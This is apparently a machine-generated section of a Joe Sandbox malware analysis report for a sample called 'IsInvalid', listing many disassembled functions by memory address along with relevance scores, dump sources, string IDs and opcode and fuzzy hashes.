                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1941999260.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_5dd0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ($4'^q$4'^q
                                                                      • API String ID: 0-1470385644
                                                                      • Opcode ID: 7c9ed255bfda057001e158b3d3c8263a5a2af8d5c04fc71844241060ada976be
                                                                      • Instruction ID: 1edcdd806114318316da692739b8d71252b93a386b2304cc575a6d35a4d365f6
                                                                      • Opcode Fuzzy Hash: 7c9ed255bfda057001e158b3d3c8263a5a2af8d5c04fc71844241060ada976be
                                                                      • Instruction Fuzzy Hash: 37722978E08209CFDB19CBA4D958BBEFBB2FF45301F50805AE552AB294C7349945CFA1
                                                                      Function 05DD2970 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1941999260.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_5dd0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q
                                                                      • API String ID: 0-2697143702
                                                                      • Opcode ID: 852335777b8530ddcdf292ea1eed0bf350b414a1ac2d02fa735e149c054aca08
                                                                      • Instruction ID: f8227abb8dc1d6cd58fdb494195f584e6c3ed001a77f1fa4daadabeadbdb2c40
                                                                      • Opcode Fuzzy Hash: 852335777b8530ddcdf292ea1eed0bf350b414a1ac2d02fa735e149c054aca08
                                                                      • Instruction Fuzzy Hash: DFF1C278D05218DFCB68DFA8E988AACFBB2FF49315F60502AE416A7354CB345985CF50
                                                                      Function 05DD3540 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1941999260.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_5dd0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q
                                                                      • API String ID: 0-2697143702
                                                                      • Opcode ID: 9bbfbeacd2018f7166b87e10c6b8c8274e7bb90b2b140455eb7aee9bc1c8a50e
                                                                      • Instruction ID: 80bb35a9669d4872efe5f4e8f38e8f2dc3f0ecfa5bbd9a4c73a41cb5d6389763
                                                                      • Opcode Fuzzy Hash: 9bbfbeacd2018f7166b87e10c6b8c8274e7bb90b2b140455eb7aee9bc1c8a50e
                                                                      • Instruction Fuzzy Hash: F5C1E574E04209CFCB18DFA9D9546ADFBB2FF89311F50882AD4126B354C7359986CFA2
                                                                      Function 05DD1C27 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1941999260.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_5dd0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ($4'^q
                                                                      • API String ID: 0-789422559
                                                                      • Opcode ID: df5571d44d46455d49d83c48f7caad6765b5d6fabbb8c29b094f81b93d0aef57
                                                                      • Instruction ID: 397d51267ba4fbdf20a4ec04e6370dc847d67e5239d78296f7fb0808b093180f
                                                                      • Opcode Fuzzy Hash: df5571d44d46455d49d83c48f7caad6765b5d6fabbb8c29b094f81b93d0aef57
                                                                      • Instruction Fuzzy Hash: 5DA1A4709093899FDB16CBB5DC15BAABF75FF06310F15809BE1409B2A2C7745944CB72
                                                                      Function 01400B97 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: e872309431e89510e82989c169c0b10d06e2f5eea874be754138859a33d3060d
                                                                      • Instruction ID: 5591a9caa64961c0470e952df742e76aee1e0bad598d7e977df331d30bde3337
                                                                      • Opcode Fuzzy Hash: e872309431e89510e82989c169c0b10d06e2f5eea874be754138859a33d3060d
                                                                      • Instruction Fuzzy Hash: D041F430A086498FC70BDFAAC4647ADBBF1AF55254F1540ABE441AB3F2DB745C02CB52
                                                                      Function 01400860 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 3b8154a8b83129cca519a7de2ad43d275168becfeaf58e9bd286d811696a2818
                                                                      • Instruction ID: 05b6f07a6b0d8225b96f133f28a103f537bfb1a9c91e37887eeebf314e7bc436
                                                                      • Opcode Fuzzy Hash: 3b8154a8b83129cca519a7de2ad43d275168becfeaf58e9bd286d811696a2818
                                                                      • Instruction Fuzzy Hash: C4218032908109DBE71A9AA6C0557BE7BB1BB48780F10443BF4437B2E4DB305A46CBE2
                                                                      Function 01400870 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 093d73317dd049e38e3c0244c678010ef4a5f5f11f27fb68cc3003e185a20c25
                                                                      • Instruction ID: 584857f6d218dee2fa8c3acc0ab6c730135ddb211200a47efc321c4f5fd82746
                                                                      • Opcode Fuzzy Hash: 093d73317dd049e38e3c0244c678010ef4a5f5f11f27fb68cc3003e185a20c25
                                                                      • Instruction Fuzzy Hash: 4E216031A08109DBE71ADA66C4557BE7AB1BB48780F104437F5437B2E4DB345A468BE2
                                                                      Function 01400953 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 14fd0d7adb875391b1613d54253a4c27dc835f56ce98fca23f255b0940e5459b
                                                                      • Instruction ID: c42e935ff4c23b334ff47cad138bbe89069a0405b8aedad68fbb18065d3bdc9e
                                                                      • Opcode Fuzzy Hash: 14fd0d7adb875391b1613d54253a4c27dc835f56ce98fca23f255b0940e5459b
                                                                      • Instruction Fuzzy Hash: 2D114D32A08109DBEB1ADA66C0547BE76B1BB48784F144437F443BB2E4DB344A428BE2
                                                                      Function 01400BDD Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 18307178fb8a487f428bd0a3211a8cdd8693ed349ccb73543bce040f16a4c062
                                                                      • Instruction ID: c359ed3648939cb855808a7642c34fb8670e81222222f37994010c1badb0e917
                                                                      • Opcode Fuzzy Hash: 18307178fb8a487f428bd0a3211a8cdd8693ed349ccb73543bce040f16a4c062
                                                                      • Instruction Fuzzy Hash: BF210E34B001159FDB19DF6AC494BADBBF2AF88744F15806AE805AB3B5CB759D01CB81
                                                                      Function 074A0238 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Y
                                                                      • API String ID: 0-3233089245
                                                                      • Opcode ID: d940cc4dbe9149313c2cd46cfaee20e54425764a0cb73d8f4bc5aec83aced288
                                                                      • Instruction ID: fdb6ce760d0355d2dd786e2ff2c06ea57a9e38ce69d87e2f9eb3ebb0c3c03a21
                                                                      • Opcode Fuzzy Hash: d940cc4dbe9149313c2cd46cfaee20e54425764a0cb73d8f4bc5aec83aced288
                                                                      • Instruction Fuzzy Hash: 57F0B774A1011ACFCBA8DF18C994A9AB7B5FB48309F1080959559A3348DF309ECACFA0
                                                                      Function 074A41AF Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p
                                                                      • API String ID: 0-2181537457
                                                                      • Opcode ID: 8c7c0803a947f5f1c87087872a5bf86d7c6597b0371b155b4ca31752041e0554
                                                                      • Instruction ID: 5ea7f879e787628a36841978cb29cf48611f2663a691e2bd54566eddcc44ea58
                                                                      • Opcode Fuzzy Hash: 8c7c0803a947f5f1c87087872a5bf86d7c6597b0371b155b4ca31752041e0554
                                                                      • Instruction Fuzzy Hash: 83F03A74A1411ADFCB18DF18CD64ADAB7B5FB88304F0040D9D529A3348DB305D85CF50
                                                                      Function 0140F968 Relevance: .2, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4b8b724d200f0a0c428878dfd86678bfd261291744931fc87967e5494f51ea65
                                                                      • Instruction ID: 3ce207ad7a4a4f488d452f6a8cd428e3dcc875991dc4e584081f916c84d3bcd3
                                                                      • Opcode Fuzzy Hash: 4b8b724d200f0a0c428878dfd86678bfd261291744931fc87967e5494f51ea65
                                                                      • Instruction Fuzzy Hash: 07811635A00618CFCB25DF69C59499EBBF5BF88710B15806AE8169B371DB30ED46CF90
                                                                      Function 014090F5 Relevance: .1, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4cf396e2b2f436c2661d4bb3009dfc0577c0b11c679e1ee2db37659acc253a87
                                                                      • Instruction ID: 2ae8b08e59c6e8b3d97a2ba38b55ad4f0b0e0ca31c8cdaeb7786ae89e2a185db
                                                                      • Opcode Fuzzy Hash: 4cf396e2b2f436c2661d4bb3009dfc0577c0b11c679e1ee2db37659acc253a87
                                                                      • Instruction Fuzzy Hash: 8F31D374A05208DFEB06DFA9D5087AE7FF1FB45308F1080BAD009AB6A6C7704A85CB91
                                                                      Function 0140165C Relevance: .1, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25649adf36c0445a2947624a3c2d83906034405b2c46ba075f545191c0ff81d4
                                                                      • Instruction ID: ba918d68831ee78cc767ec65160e080d14c99af1f1ca2ffe52d1fc193d1696db
                                                                      • Opcode Fuzzy Hash: 25649adf36c0445a2947624a3c2d83906034405b2c46ba075f545191c0ff81d4
                                                                      • Instruction Fuzzy Hash: D8315D70D002589FDB15DFAAC580AEEBFF1EF48750F24842AE949AB360DB349945CF90
                                                                      Function 014009F1 Relevance: .1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 11699751eea3cebcf18c3b080194800260355b5119efe367036483114aa18bdc
                                                                      • Instruction ID: 875ac82c1fec979f127cccbd8a09f254660cc6f409defa97e380989e09030753
                                                                      • Opcode Fuzzy Hash: 11699751eea3cebcf18c3b080194800260355b5119efe367036483114aa18bdc
                                                                      • Instruction Fuzzy Hash: 9921D630B08106DFC707DB7A84106BE7BB1BFA52C4704867BE4069B2A5EB709D468F92
                                                                      Function 01401668 Relevance: .1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8857dd8daa1e4716cd661c5fc763b1dfe76c33386824c443928bd5c42fc0bb51
                                                                      • Instruction ID: d391445c9ac0bab146de0c9f9da24bb74df814b12c339818c448a19689738699
                                                                      • Opcode Fuzzy Hash: 8857dd8daa1e4716cd661c5fc763b1dfe76c33386824c443928bd5c42fc0bb51
                                                                      • Instruction Fuzzy Hash: C2313A70D002589FDB15DFAAC580ADEBFF5EF48740F24802AE909AB360DB349945CF90
                                                                      Function 014009D1 Relevance: .1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f7fdf227ab1a788177e1a867a418796c1092ff595f86c6eccecf63c07fe46e2b
                                                                      • Instruction ID: 232b3abe022a80502ed39f1e0716353a478a50827175ac7f393ee8c5304eac52
                                                                      • Opcode Fuzzy Hash: f7fdf227ab1a788177e1a867a418796c1092ff595f86c6eccecf63c07fe46e2b
                                                                      • Instruction Fuzzy Hash: 89212730B041468FCB17DB7AC4107AEBBA1EF9569470446BBE0468B3F5EE35DC468B82
                                                                      Function 0140D1E0 Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d66b63c4849213a31c1f971cb4037ebf42e218ec0f6172f70ff94b2690f11a10
                                                                      • Instruction ID: f08fdf1b6f6c2d42bf73215aadef948cb9d8b042bd5ba3aa80393d87067f5a43
                                                                      • Opcode Fuzzy Hash: d66b63c4849213a31c1f971cb4037ebf42e218ec0f6172f70ff94b2690f11a10
                                                                      • Instruction Fuzzy Hash: C4214BB4E04209CBDB09DFEAD5443EEBAF6BB88320F10943AD125A3394DB744945CF91
                                                                      Function 014091B0 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67148e82d3929fc20d289d79430226a2990fbd7b77d542ae9a3606e7ecbfdaff
                                                                      • Instruction ID: f7ae0018e4ebb9085cc33cabc338fc550b9dc4f650f5969d4b98dc1756843adc
                                                                      • Opcode Fuzzy Hash: 67148e82d3929fc20d289d79430226a2990fbd7b77d542ae9a3606e7ecbfdaff
                                                                      • Instruction Fuzzy Hash: CD315CB4E04209DFEB05DFAAD1487AEBBF2FB49309F10C06AC119A7695DB704A84CF51
                                                                      Function 011AD030 Relevance: .1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926192811.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_11ad000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a56623418d0aa3acdc07460aea6cda25b069a25deabc523240b24a34f2e4c00
                                                                      • Instruction ID: 0f6c543a4b67e11344b101d2286eb3c09d9a7d262ede70fa84c9b09d2f5b3946
                                                                      • Opcode Fuzzy Hash: 7a56623418d0aa3acdc07460aea6cda25b069a25deabc523240b24a34f2e4c00
                                                                      • Instruction Fuzzy Hash: A72137B9544600DFCF19DF58EAC4B2BBF65FB84314F60C169D9094B646C336D40ACBA2
                                                                      Function 01400D70 Relevance: .1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0d1e40b6f9a0aa8ca15beb9327f2059ba73816be7f8d09cd2d20ea479cfdec40
                                                                      • Instruction ID: 87683fde96f0e96100108364fe0ed95c1d257c69e84b3e6a8d5daca93cabcee6
                                                                      • Opcode Fuzzy Hash: 0d1e40b6f9a0aa8ca15beb9327f2059ba73816be7f8d09cd2d20ea479cfdec40
                                                                      • Instruction Fuzzy Hash: 57215630B04109DBCB1ADA6A84453ADB7B2AFC9294F144437E506A72E0DA356D4387B6
                                                                      Function 0140E5D0 Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fd4ebce89ff6f8758e6484ad7450123fa171ea3b060afbc140bd3d3b3ffb114
                                                                      • Instruction ID: 17b47699539091238f781c31c33e9fa6ea4b58c0ce5643736b81d1fd26e0f971
                                                                      • Opcode Fuzzy Hash: 2fd4ebce89ff6f8758e6484ad7450123fa171ea3b060afbc140bd3d3b3ffb114
                                                                      • Instruction Fuzzy Hash: 9B1137B4D04219CBDB15CF9AD8446EEBBF6FB8C310F14883AD518B32A0DB355A55CBA0
                                                                      Function 074A3418 Relevance: .1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f7f15cea2f8ef66f069c51245fd8eb1f76bad1b1607f9c1957b0229e2fe6f867
                                                                      • Instruction ID: e4d23a406238766e95a2541d6e4b55860e887dc39dd5937000dc29a9b7795192
                                                                      • Opcode Fuzzy Hash: f7f15cea2f8ef66f069c51245fd8eb1f76bad1b1607f9c1957b0229e2fe6f867
                                                                      • Instruction Fuzzy Hash: F131A478A06229CFEB64CF18CA94A99BBF5FF49314F0480D9D808A7356DB309E81CF41
                                                                      Function 01400AE0 Relevance: .1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16367b2ec47b63e5285db17d31644233e78e91ee8ed29567f03420fc2e6b0adc
                                                                      • Instruction ID: 3569c794f8829789088a5f933fa64cab74d35a5467ed42bfa9cffbe2d4a1ada3
                                                                      • Opcode Fuzzy Hash: 16367b2ec47b63e5285db17d31644233e78e91ee8ed29567f03420fc2e6b0adc
                                                                      • Instruction Fuzzy Hash: DF01C030A18949AEC70AEFF680603FD7BB1AF41688F5048B7E5468B1E5DB306A07C753
                                                                      Function 011AD02B Relevance: .1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926192811.00000000011AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011AD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_11ad000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                      • Instruction ID: 271514c7a994592437f67542034c50a882d995910e426619609cdf3218b7ca39
                                                                      • Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                      • Instruction Fuzzy Hash: 0E11D37A504680CFDF16CF54EAC4B16BF71FB84314F24C1AAD8490B656C336D41ACBA2
                                                                      Function 074BA680 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c40f65c79399145ed693316329d9484356a50492c8fd57e8769fc268d64269c
                                                                      • Instruction ID: 1dbaf31207153141cf6fee4d37025d3169008a50d431ac864de695d23ab49bdc
                                                                      • Opcode Fuzzy Hash: 2c40f65c79399145ed693316329d9484356a50492c8fd57e8769fc268d64269c
                                                                      • Instruction Fuzzy Hash: 9A1180B4E05209DFCB44DFA8D688AAEBBF5FB48204F20846A9919E7350D7709E41CF91
                                                                      Function 0119D76D Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926124696.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_119d000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 626b0571a8cf676b8ae746abbe6e182d87b5b0dcde2540beb96aed76a4c7fa06
                                                                      • Instruction ID: e10b9693807400819ecc42b8d3b5f1d67edb8f01767fd651640607f92dc1b4e0
                                                                      • Opcode Fuzzy Hash: 626b0571a8cf676b8ae746abbe6e182d87b5b0dcde2540beb96aed76a4c7fa06
                                                                      • Instruction Fuzzy Hash: AD01D0315097849AEF1D4B69EDC476BFFD8DF41328F18C425ED594A146C379D840C672
                                                                      Function 01400AF0 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: affd1e805bb2b86ccb37abd98c6192b8cf07030f51f53b3186374b425c967c33
                                                                      • Instruction ID: 70903d370ad201ff45eceb6949bef7005fc56c7b3cda7ad4190b0a7d1dbda458
                                                                      • Opcode Fuzzy Hash: affd1e805bb2b86ccb37abd98c6192b8cf07030f51f53b3186374b425c967c33
                                                                      • Instruction Fuzzy Hash: ED012C30A08809EACB0AEEE680503BD77B1AB40688F904477E516972E4EB306A078B52
                                                                      Function 01400D44 Relevance: .0, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926434021.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_1400000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5794f24ef8b69c5e1880ec1a060ab5637ed6b7729382d6a76b01e047a2df7f15
                                                                      • Instruction ID: 68063abeaff6216017a948d9450eb72949b4375312b498e1012fc42c019a95be
                                                                      • Opcode Fuzzy Hash: 5794f24ef8b69c5e1880ec1a060ab5637ed6b7729382d6a76b01e047a2df7f15
                                                                      • Instruction Fuzzy Hash: BDF04F31E08109CADB1ACA96C5003FDBBB1AF883A4F244477E506776F0D6311E438BB2
                                                                      Function 0119D76C Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1926124696.000000000119D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0119D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_119d000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 482f385511972b42de033e2127fe39d3adac11c29e2786190b32de62d7227f25
                                                                      • Instruction ID: 0f367a696524d28b2cc07f590483b3dfad85ef713ddd85de058c1c1dfb2efce3
                                                                      • Opcode Fuzzy Hash: 482f385511972b42de033e2127fe39d3adac11c29e2786190b32de62d7227f25
                                                                      • Instruction Fuzzy Hash: F2F0C2724083849EEB148A1AD8C4B66FFA8EB41628F18C45AED584B286C3799840CA70
                                                                      Function 074A405F Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1944838771.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74a0000_IsInvalid.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2680e189e14853d5aa57f9071e7ef2c826dc603ff7a5eb2d4e39f1c096914068
                                                                      • Instruction ID: 717869effc8e5dec81afbbc038d8916fc20c03ea91bf1cf27a322aa3f526e4d8
